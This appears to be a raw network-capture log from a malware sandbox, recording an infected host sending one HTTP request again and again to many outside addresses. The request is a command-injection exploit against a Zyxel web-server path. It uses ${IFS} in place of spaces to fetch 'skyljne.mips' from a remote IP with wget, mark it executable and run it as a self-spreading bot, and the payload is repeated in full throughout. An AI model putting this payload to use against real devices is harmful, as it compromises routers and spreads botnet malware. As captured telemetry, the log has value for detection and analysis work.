                                        Jan 14, 2024 16:18:47.515441895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4913192.168.2.1357284140.11.189.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515486956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4914192.168.2.133947224.37.181.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515541077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4915192.168.2.1347820163.151.46.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515566111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4916192.168.2.1353428136.243.111.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515614033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4917192.168.2.1347072144.143.215.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515659094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4918192.168.2.1340296199.217.53.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515696049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4919192.168.2.1348342119.142.136.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515723944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4920192.168.2.134811072.18.132.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515784025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4921192.168.2.1346688103.246.17.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515809059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4922192.168.2.134685499.89.254.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515860081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4923192.168.2.1349016143.156.45.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515878916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4924192.168.2.134476636.177.46.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515963078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4925192.168.2.1336650195.134.193.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515965939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4926192.168.2.135959027.247.101.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515966892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4927192.168.2.1356800193.148.126.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516042948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4928192.168.2.1350650212.201.46.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516087055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4929192.168.2.1341720182.183.150.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516120911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4930192.168.2.136007237.181.123.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516148090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4931192.168.2.135558897.43.44.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516169071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4932192.168.2.1348758205.87.204.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516223907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4933192.168.2.134065632.49.219.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516272068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4934192.168.2.134216648.94.148.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516303062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4935192.168.2.135524848.78.163.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516343117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4936192.168.2.134144054.189.254.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516376019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4937192.168.2.1347920185.109.94.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516427040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4938192.168.2.1358860106.127.75.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516443968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4939192.168.2.1355446144.162.253.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516499996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4940192.168.2.1339696159.142.234.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516527891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4941192.168.2.13557384.190.112.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516573906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4942192.168.2.1340908198.23.212.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516613007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4943192.168.2.1353582119.12.164.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516654015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4944192.168.2.1357660186.77.247.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516710043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4945192.168.2.1340116166.209.7.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516733885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4946192.168.2.1334160110.186.242.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516783953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4947192.168.2.1344904138.42.25.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516813993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4948192.168.2.135489037.60.82.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516864061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4949192.168.2.1351446184.211.25.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516920090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4950192.168.2.1355074121.128.36.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.516967058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4951192.168.2.1353198188.61.154.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517005920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4952192.168.2.1354512181.76.161.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517066956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4953192.168.2.1359160172.135.83.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517080069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4954192.168.2.1345574155.60.18.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517117023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4955192.168.2.133425234.217.2.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517169952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4956192.168.2.1349498145.237.241.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517215967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4957192.168.2.13456124.193.28.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517236948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4958192.168.2.134627052.10.251.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517277002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4959192.168.2.1342396184.107.7.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517330885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4960192.168.2.135278069.214.39.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517369032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4961192.168.2.1353876129.203.243.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517421007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4962192.168.2.134164069.144.143.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517452955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4963192.168.2.136040644.8.179.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517501116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4964192.168.2.1340788186.88.168.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517540932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4965192.168.2.134153099.155.254.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517586946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4966192.168.2.133491641.121.60.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517611980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4967192.168.2.133781467.194.113.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517674923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4968192.168.2.135716823.66.119.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517705917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4969192.168.2.13531204.247.169.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517750978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4970192.168.2.135218099.102.78.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517788887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4971192.168.2.134915862.53.233.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517839909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4972192.168.2.1351418114.104.156.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517867088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4973192.168.2.1360410206.66.250.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517913103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4974192.168.2.135366250.111.13.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.517965078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4975192.168.2.1345612192.178.23.11443
                                        TimestampBytes transferredDirectionData
